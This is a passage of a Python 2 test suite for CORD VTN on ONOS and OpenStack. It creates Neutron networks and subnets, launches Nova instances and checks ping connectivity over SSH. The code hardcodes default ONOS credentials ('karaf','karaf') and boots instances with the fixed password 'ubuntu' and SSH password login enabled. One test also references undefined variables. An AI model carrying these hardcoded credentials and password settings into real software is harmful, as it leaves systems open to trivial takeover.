resp = requests.post(url=url, auth=auth, data =json_network_type_data)
return resp
def nova_instance_creation_and_validation(self,net_name,nova_obj,instance_name,image_name, flavor_id):
print nova_obj.images.list()
image = nova_obj.images.find(name=image_name)
flavor = nova_obj.flavors.find(name=flavor_id)
nics_list = ""
if len(net_name) == 2:
network_1 = nova_obj.networks.find(label=net_name[0])
network_2 = nova_obj.networks.find(label=net_name[1])
print network_1.id
print network_2.id
nics_list = [{'net-id':network_1.id},{'net-id':network_2.id}]
else:
network_1 = nova_obj.networks.find(label=net_name)
print network_1.id
nics_list = [{'net-id':network_1.id}]
server = nova_obj.servers.create(name = instance_name,
image = image.id,
flavor = flavor.id,
nics = nics_list,
userdata = "#cloud-config \n password: ubuntu \n chpasswd: { expire: False }\n ssh_pwauth: True")
# key_name = 'id_rsa')
server_details = nova_obj.servers.find(id=server.id)
print('Server is launched and status is %s' %server_details.status)
if server_details.status == 'BUILD':
time.sleep(120)
server_details = nova_obj.servers.find(id=server.id)
print('After delay server status is %s state'%server_details.status)
if server_details.status == 'ERROR':
print('Server status is still in %s state'%server_details.status)
server_boot_up_log = nova_obj.servers.get_console_output(server.id)
print 'Server boot Up console log \n%s'%server_boot_up_log
return server_details
def create_net_subnet_nova_instance(self,net_name, subnet_name, instance_vm_details,management_type):
result = self.neutron_network_creation_and_validation(net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(net_name,subnet_name)# sub_net_start = subnet_name[2], sub_net_end =subnet_name[3])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(net_name, management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(net_name,nova,instance_vm_details[0],instance_vm_details[1],instance_vm_details[2])
assert_equal(new_instance_details.status, 'ACTIVE')
return [nova, new_instance_details]
def nova_instance_tenants_access_check(self, target_tenants_details, compute_details = None, source_tenants_details = None , check_type = 'Ping_from_compute'):
source_tenant_ip = ''
target_tenant_ip = ''
cmd = ''
status = ''
output = ''
## TO DO New instance is not getting subnet ip, hence checking only mysite-vsg1 vm from compute node
if compute_details is None:
compute_ip = '10.1.0.17'
else:
compute_ip = compute_details.ip
## TO DO New instance is not getting subnet ip, hence checking only mysite-vsg1 vm from compute node
if target_tenants_details == {}:
target_tenants_details = '10.1.0.1'
## TO DO New instance is not getting subnet ip, hence checking only mysite-vsg1 vm from compute node
if source_tenants_details is not None:
if source_tenants_details == {}:
source_tenants_details = '10.1.0.1'
if check_type == "Ping_from_compute":
cmd2 = "ping -c 3 {0}".format(target_tenants_details)
ssh_agent = SSHTestAgent(host = compute_ip)
status, output = ssh_agent.run_cmd(cmd2, timeout = 5)
print output
if source_tenants_details is not None:
if check_type == "Ping_from_source_tenant":
cmd = "ping -c 3 {0}".format(target_tenants_details)
ssh_cmd = 'ssh {} {}'.format(source_tenants_details, cmd)
print 'Executing ssh command on compute node %s'%ssh_cmd
ssh_agent = SSHTestAgent(host = compute_ip)
status, output = ssh_agent.run_cmd(ssh_cmd, timeout = 5)
print output
if check_type == "Ping_to_external":
cmd = "ping -c 3 google.com"
ssh_cmd = 'ssh {} {}'.format(target_tenants_details, cmd)
ssh_agent = SSHTestAgent(host = compute_ip)
status, output = ssh_agent.run_cmd(ssh_cmd, timeout = 5)
print output
if status == True and output:
print "Ping is successful"
output = output.strip()
elif status == False:
print "Ping is not successful"
output = None
return [status, output]
def nova_instance_deletion(self, nova_obj, server_details):
results_nova_instance_deletion=nova_obj.servers.delete(server_details.id)
if results_nova_instance_deletion == None:
print"Nova instance is deleted"
else:
print"Nova instance is not deleted"
return results_nova_instance_deletion
def test_cordvtn_neutron_network_creation_and_validation_on_head_node_with_neutron_service(self):
"""
Test Method:
0. Create vtn_test_1_net.
1. Do GET Rest API and validate creation of network.
2. Validate network on neutron openstack.
"""
result = self.neutron_network_creation_and_validation('vtn_test_1_net')
if result is True:
self.neutron_network_deletion('vtn_test_1_net')
assert_equal(result, True)
def test_cordvtn_neutron_network_creation_and_validation_on_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "vtn_test_2_net","admin_state_up":True}}
net = neutron.create_network(body=body_example)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "vtn_test_2_net")
self.neutron_network_deletion('vtn_test_2_net')
assert_equal(result, True)
def test_cordvtn_with_neutron_network_deletion_recreation_and_validation_on_head_node_with_neutron_service(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
result = self.neutron_network_creation_and_validation('vtn_test_3_net')
if result is True:
self.neutron_network_deletion('vtn_test_3_net')
assert_equal(result, True)
result_again = self.neutron_network_creation_and_validation('vtn_test_3_net')
if result_again is True:
self.neutron_network_deletion('vtn_test_3_net')
assert_equal(result, True)
def test_cordvtn_with_neutron_network_deletion_recreation_and_validation_on_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "vtn_test_4_net","admin_state_up":True}}
net = neutron.create_network(body=body_example)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "vtn_test_4_net")
assert_equal(result, True)
self.neutron_network_deletion('vtn_test_4_net')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "vtn_test_4_net")
assert_equal(result, False)
net = neutron.create_network(body=body_example)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "vtn_test_4_net")
self.neutron_network_deletion('vtn_test_4_net')
assert_equal(result, True)
def test_cordvtn_with_neutron_management_network_creation_and_validation_on_head_node_with_neutron_service(self):
test_net_name = 'vtn_test_5_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
result = self.neutron_network_creation_and_validation('vtn_test_5_net_management')
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
if sub_result[0] is True:
self.neutron_network_deletion('vtn_test_5_net_management')
assert_equal(sub_result[0], True)
def test_cordvtn_with_neutron_management_network_creation_and_validation_on_onos(self):
self.neutron_network_creation_and_validation('vtn_test_6_net_management')
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
networks = neutron.list_networks(name='vtn_test_6_net_management')
net_id = self.get_key_value(d=networks, key = 'id')
cidr = "172.27.0.0/24"
body_subnet_example = {"subnet":{"network_id": net_id[2],"ip_version":4, "cidr":str(cidr), "allocation_pools": [{"start": "172.27.0.20", "end": "172.27.0.21"}]}}
neutron_sub = neutron.create_subnet(body_subnet_example)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == 'vtn_test_6_net_management':
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
log_test.info('Sub network is not successful')
self.neutron_network_deletion('vtn_test_6_net_management')
assert_equal(False, True)
break
elif sub_net_id[2] == cidr:
log_test.info('Sub network is successful')
self.neutron_network_deletion('vtn_test_6_net_management')
assert_equal(sub_net_id[0], True)
break
def test_cordvtn_neutron_management_network_creation_and_post_network_type_management_local_to_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Pushed the network type as management local to onos
5. Verified that onos is having under management network
"""
test_net_name = 'vtn_test_7_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == test_net_name:
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
log_test.info('Sub network is not successful')
assert_equal(False, True)
break
elif sub_net_id[2] == test_sub_net_cidr[1]:
log_test.info('Sub network is successful')
assert_equal(sub_net_id[0], True)
break
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
print("Response from onos to change network service type as management local = %s" %net_type_post.text)
net_type_json = json.loads(net_type_post.text)
self.neutron_network_deletion(test_net_name)
assert_equal(net_type_json['message'], 'null already exists')
def test_cordvtn_with_management_network_creation_launching_nova_instance_and_validation_on_head_node_with_nova_service(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
"""
test_net_name = 'vtn_test_8_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_8_nova_instance_management_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
self.neutron_network_deletion(test_net_name)
self.nova_instance_deletion(nova, new_instance_details)
assert_equal(new_instance_details.status, 'ACTIVE')
def test_cordvtn_with_public_network_creation_and_validation_on_head_node_with_neutron_service(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork who ip is under management network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
test_net_name = 'vtn_test_9_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26",'10.6.1.193']
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
if sub_result[0] is True:
self.neutron_network_deletion(test_net_name)
assert_equal(sub_result[0], True)
def test_cordvtn_with_public_network_creation_and_validation_on_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whoes ip is under management network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
"""
test_net_name = 'vtn_test_10_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26", '10.6.1.193']
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == test_net_name:
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
print('Sub network is not successful')
self.neutron_network_deletion(test_net_name)
assert_equal(False, True)
break
elif sub_net_id[2] == test_sub_net_cidr[1]:
print('Sub network is successful')
self.neutron_network_deletion(test_net_name)
assert_equal(sub_net_id[0], True)
break
def test_cordvtn_with_public_network_creation_and_post_network_type_as_public_to_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Pushed the network type as management local to onos
5. Verified that onos is having under management network
"""
test_net_name = 'vtn_test_11_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26", '10.6.1.193']
test_management_type = "public"
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == test_net_name:
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
log_test.info('Sub network is not successful')
assert_equal(False, True)
break
elif sub_net_id[2] == test_sub_net_cidr[1]:
log_test.info('Sub network is successful')
assert_equal(sub_net_id[0], True)
break
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
print("Response from onos to change network service type as management local = %s" %net_type_post.text)
net_type_json = json.loads(net_type_post.text)
self.neutron_network_deletion(test_net_name)
assert_equal(net_type_json['message'], 'null already exists')
def test_cordvtn_public_network_creation_with_launching_nova_instance_and_validation_on_head_node_with_nova_service(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under public network
5. Validate new nova instance is created on nova service
"""
test_net_name = 'vtn_test_12_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26",'10.6.1.193']
instance_vm_name = 'vtn_test_12_nova_instance_public_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
self.neutron_network_deletion(test_net_name)
self.nova_instance_deletion(nova, new_instance_details)
assert_equal(new_instance_details.status, 'ACTIVE')
def test_cordvtn_with_private_network_creation_and_validation_on_head_node_with_neutron_service(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork who ip is under private network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
test_net_name = 'vtn_test_13_net_private'
test_sub_net_cidr = ["private","10.160.160.160/24",'10.160.160.1']
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
if sub_result[0] is True:
self.neutron_network_deletion(test_net_name)
assert_equal(sub_result[0], True)
def test_cordvtn_with_private_network_creation_and_validation_on_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whoes ip is under management network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
"""
test_net_name = 'vtn_test_14_net_private'
test_sub_net_cidr = ["private","10.160.160.160/24", '10.160.160.1']
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == test_net_name:
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
print('Sub network is not successful')
self.neutron_network_deletion(test_net_name)
assert_equal(False, True)
break
elif sub_net_id[2] == '10.160.160.0/24':
#elif sub_net_id[2] == test_sub_net_cidr[1]:
print('Sub network is successful')
self.neutron_network_deletion(test_net_name)
assert_equal(sub_net_id[0], True)
break
def test_cordvtn_with_private_network_creation_and_post_network_type_as_private_to_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Pushed the network type as management local to onos
5. Verified that onos is having under management network
"""
test_net_name = 'vtn_test_15_net_private'
test_sub_net_cidr = ["private","192.168.160.160/24", '192.168.160.1']
test_management_type = "private"
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == test_net_name:
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
log_test.info('Sub network is not successful')
assert_equal(False, True)
break
elif sub_net_id[2] == "192.168.160.0/24":
log_test.info('Sub network is successful')
assert_equal(sub_net_id[0], True)
break
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
print("Response from onos to change network service type as management local = %s" %net_type_post.text)
net_type_json = json.loads(net_type_post.text)
self.neutron_network_deletion(test_net_name)
assert_equal(net_type_json['message'], 'null already exists')
def test_cordvtn_with_private_network_creation_launching_nova_instance_and_validating_on_head_node_with_nova_service(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under private network
5. Validate new nova instance is created on nova service
"""
test_net_name = 'vtn_test_16_net_private'
test_sub_net_cidr = ["private","192.168.160.160/24", '192.168.160.1']
instance_vm_name = 'vtn_test_16_nova_instance_private_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
self.neutron_network_deletion(test_net_name)
self.nova_instance_deletion(nova, new_instance_details)
assert_equal(new_instance_details.status, 'ACTIVE')
def test_cordvtn_management_network_instance_and_validate_connectivity_from_host_machine_or_compute_node(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_net_name = 'vtn_test_17_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_17_nova_instance_management_net'
#image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, True)
def test_cordvtn_for_management_network_instance_and_validate_connectivity_to_external_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_net_name = 'vtn_test_18_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_18_nova_instance_management_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'], check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_with_management_network_creating_two_instances_and_validate_connectivity_between_two(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create first nova instance under management network
5. Validate first nova instance is created on nova service
6. Create second nova instance under management network
7. Validate second nova instance is created on nova service
8. Now try to ping from one nova instance to other instance, should not success
"""
test_net_name = 'vtn_test_19_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.2", "172.27.0.200"]
test_management_type = "management_local"
first_instance_vm_name = 'vtn_test_19_nova_1st_instance_management_net'
second_instance_vm_name = 'vtn_test_19_nova_2nd_instance_management_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
first_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,first_instance_vm_name,image_name,flavor_id)
second_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,second_instance_vm_name,image_name,flavor_id)
assert_equal(first_instance_details.status, 'ACTIVE')
assert_equal(second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print first_nova_instance_details.addresses
print second_nova_instance_details.addresses
address_1st_instance = first_nova_instance_details.addresses
address_2nd_instance = second_nova_instance_details.addresses
print 'Nova 1st instance management ip = %s'%(address_1st_instance[test_net_name][0]['addr'])
print 'Nova 2nd instance management ip = %s'%(address_2nd_instance[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_net_name][0]['addr'],source_tenants_details =address_2nd_instance[test_net_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, first_nova_instance_details)
self.nova_instance_deletion(nova, second_nova_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_two_management_network_instances_and_validate_connectivity_between_two_networks_via_management_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
"""
test_netA_name = 'vtn_test_20_netA_management'
test_sub_netA_cidr = ["management","172.27.0.0/24","172.27.0.2", "172.27.0.200"]
netA_instance_vm_name = 'vtn_test_20_nova_netA_instance_management_net'
test_netB_name = 'vtn_test_20_netB_management'
test_sub_netB_cidr = ["management","172.28.0.0/24","172.28.0.2", "172.28.0.200"]
netB_instance_vm_name = 'vtn_test_20_nova_netB_instance_management_net'
test_management_type = "management_local"
image_name = "vsg-1.1"
flavor_id = 'm1.small'
netA_instance_vm_details = [netA_instance_vm_name, image_name, flavor_id]
netB_instance_vm_details = [netB_instance_vm_name, image_name, flavor_id]
nova_netA, nova_instance_details_netA = self.create_net_subnet_nova_instance(test_netA_name, test_sub_netA_cidr, netA_instance_vm_details, test_management_type)
nova_netB, nova_instance_details_netB = self.create_net_subnet_nova_instance(test_netB_name, test_sub_netB_cidr, netB_instance_vm_details, test_management_type)
assert_equal(nova_instance_details_netA.status, 'ACTIVE')
assert_equal(nova_instance_details_netB.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print nova_instance_details_netA.addresses
print nova_instance_details_netB.addresses
address_1st_instance = nova_instance_details_netA.addresses
address_2nd_instance = nova_instance_details_netB.addresses
print 'Nova 1st instance management ip = %s'%(address_1st_instance[test_netA_name][0]['addr'])
print 'Nova 2nd instance management ip = %s'%(address_2nd_instance[test_netB_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_netA_name][0]['addr'],source_tenants_details =address_2nd_instance[test_netB_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova_netA, nova_instance_details_netA)
self.nova_instance_deletion(nova_netB, nova_instance_details_netB)
time.sleep(5)
self.neutron_network_deletion(test_netA_name)
self.neutron_network_deletion(test_netB_name)
assert_equal(status, False)
def test_cordvtn_creating_public_network_instance_and_validate_connectivity_from_host_machine_or_compute_node(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under public network
5. Validate new nova instance is created on nova service
6. Verify ping is not getting successful from compute node to nova instance which is created in step 4.
"""
test_net_name = 'vtn_test_21_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26",'10.6.1.193']
test_management_type = "public"
instance_vm_name = 'vtn_test_21_nova_instance_pulic_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance public ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_public_network_instance_and_validate_connectivity_to_external_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under public network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_net_name = 'vtn_test_22_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26",'10.6.1.193']
test_management_type = "public"
instance_vm_name = 'vtn_test_22_nova_instance_public_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
